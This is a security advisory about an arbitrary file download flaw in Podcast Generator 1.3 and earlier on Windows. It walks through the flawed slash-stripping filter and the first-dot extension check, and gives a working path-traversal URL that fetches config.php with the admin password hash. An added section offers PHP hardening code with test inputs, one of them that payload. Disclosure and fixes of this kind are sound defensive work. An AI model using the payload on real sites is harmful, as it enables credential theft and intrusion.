Podcast Generator <= 1.3 Arbitrary File Download (Windows)


Vulnerable file is download.php, let's start from lines 25-27:
-------------------------------------------------------
25. $filename = $_GET['filename'];
26.
27. $filename = eregi_replace("/", "", $filename);
-------------------------------------------------------
so PHP strips every forward slash from the filename variable, but under
Windows that does not matter, because a backslash ( \ ) works just as well.
OK, that was the easy part; now comes the real challenge..
-------------------------------------------------------
33. if (file_exists("$filename_path") ) { // check real existence of the file. Avoid possible cross-site scripting attacks
34.
35. $file_media = explode(".",$filename); //divide filename from extension
36.
37. $fileData = checkFileType($file_media[1],$podcast_filetypes,$filemimetypes);
-------------------------------------------------------
Line 33 is no problem as long as the file really exists, but on line 37 there is a call to checkFileType:
-------------------------------------------------------
15. function checkFileType ($filetype,$podcast_filetypes,$filemimetypes) {
16. $i=0;
17. $bool=false;
18. $fileData = array();
19.
20. while (($i < sizeof($podcast_filetypes)) && $bool==false) {
21. if ($filetype==$podcast_filetypes[$i]) {
22. $fileData[0]=$podcast_filetypes[$i];
23. $fileData[1]=$filemimetypes[$i];
24. $bool=true;
25. }
26. $i+=1;
27. }
28. return $fileData;
29.}
-------------------------------------------------------
which essentially checks whether the string after the FIRST dot is in the list of supported media types;
<offtopic>
not useful for this vuln, but I want to highlight one thing..
the supported file extensions are stored in supported_media.php in this format:
-------------------------------------------------------
18. $podcast_filetypes = array(); //filetypes array to handle multiple filetypes
19.
20. $podcast_filetypes[0]="mp3";
-------------------------------------------------------
if the author forgets to declare the new array variable (line 18), it becomes possible to
inject a fake extension when register_globals is turned on..
</offtopic>
Back to the vuln: I have discovered that Windows, while accessing nested dirs, does
not check if every dir name provided exists, it just checks if the result is true or false..
for example, see this cmd listing:
-------------------------------------------------------
Z:\media\AA845DA3845D72B5>mkdir tmp
Z:\media\AA845DA3845D72B5>cd tmp
Z:\media\AA845DA3845D72B5\tmp>dir
Il volume nell'unità Z non ha etichetta.
Numero di serie del volume: 0000-0000
Directory di Z:\media\AA845DA3845D72B5\tmp
09/03/2010 13.33 <DIR> .
09/03/2010 13.33 <DIR> ..
0 File 0 byte
2 Directory 299.372.544 byte disponibili
Z:\media\AA845DA3845D72B5\tmp>
-------------------------------------------------------
so the new dir is empty, but..
-------------------------------------------------------
Z:\media\AA845DA3845D72B5\tmp>cd donno\wanna\write\..\..\..\..\
Z:\media\AA845DA3845D72B5>
-------------------------------------------------------
Windows does not return an error, it just goes up one dir. Now we are ready to exploit
podcastgen with a URL like this:
http://www.example.com/podcastgen/download.php?filename=.mp3.\..\..\config.php
and download the config file containing the hashed admin password, which, if cracked, can
lead to remote code execution.
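For the fix side, here is an added hardening example (not Podcast Generator's own code) showing how a download handler should validate the filename so that both tricks above fail: the backslash that the slash-stripping filter ignores, and the extension taken from the first dot instead of the last. The names safe_media_path, $media_dir and the sample inputs are assumptions for this example.

```php
<?php
// Added example, not the project's code. Assumed: $media_dir is the directory
// download.php is meant to serve from; $podcast_filetypes is the allowed-extension
// list from supported_media.php.

function safe_media_path($filename, $media_dir, array $podcast_filetypes) {
    // 1. Reject any path separator (either OS) and any "..", instead of silently
    //    rewriting the input as eregi_replace("/", "", ...) did. This also covers
    //    the Windows back-slash that the original filter never looked at.
    if (preg_match('#[\\\\/]|\.\.#', $filename)) {
        return false;
    }
    // 2. Take the extension from the LAST dot, not the first.
    //    explode(".", ".mp3.\\..\\..\\config.php")[1] is "mp3", which satisfied
    //    checkFileType even though the real extension was "php".
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $podcast_filetypes, true)) {
        return false;
    }
    // 3. Resolve the final path and require it to stay inside $media_dir.
    //    realpath() collapses "..", so the "donno\wanna\write\..\.." behaviour
    //    cannot walk out of the media directory even if step 1 were bypassed.
    //    realpath() also returns false for a missing file, replacing file_exists().
    $base = realpath($media_dir);
    $real = realpath($media_dir . DIRECTORY_SEPARATOR . $filename);
    if ($base === false || $real === false) {
        return false;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $real;
}

// Constructed sample inputs; 'episode01.mp3' is only accepted if that file
// actually exists under media/, everything else is rejected before any disk access.
$podcast_filetypes = array('mp3', 'ogg');
$tests = array(
    'episode01.mp3',                  // legitimate request
    ".mp3.\\..\\..\\config.php",      // the payload from the advisory above
    '..\\config.php',                 // plain traversal with a back-slash
    'config.php',                     // extension not in the allow-list
);
foreach ($tests as $t) {
    $r = safe_media_path($t, __DIR__ . '/media', $podcast_filetypes);
    echo str_pad($t, 28) . ' => ' . ($r === false ? 'rejected' : $r) . "\n";
}
```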
[BlackHawk - 09/03/2010 - Some rights reserved (http://creativecommons.org/licenses/by-nc-sa/2.5/it/) ]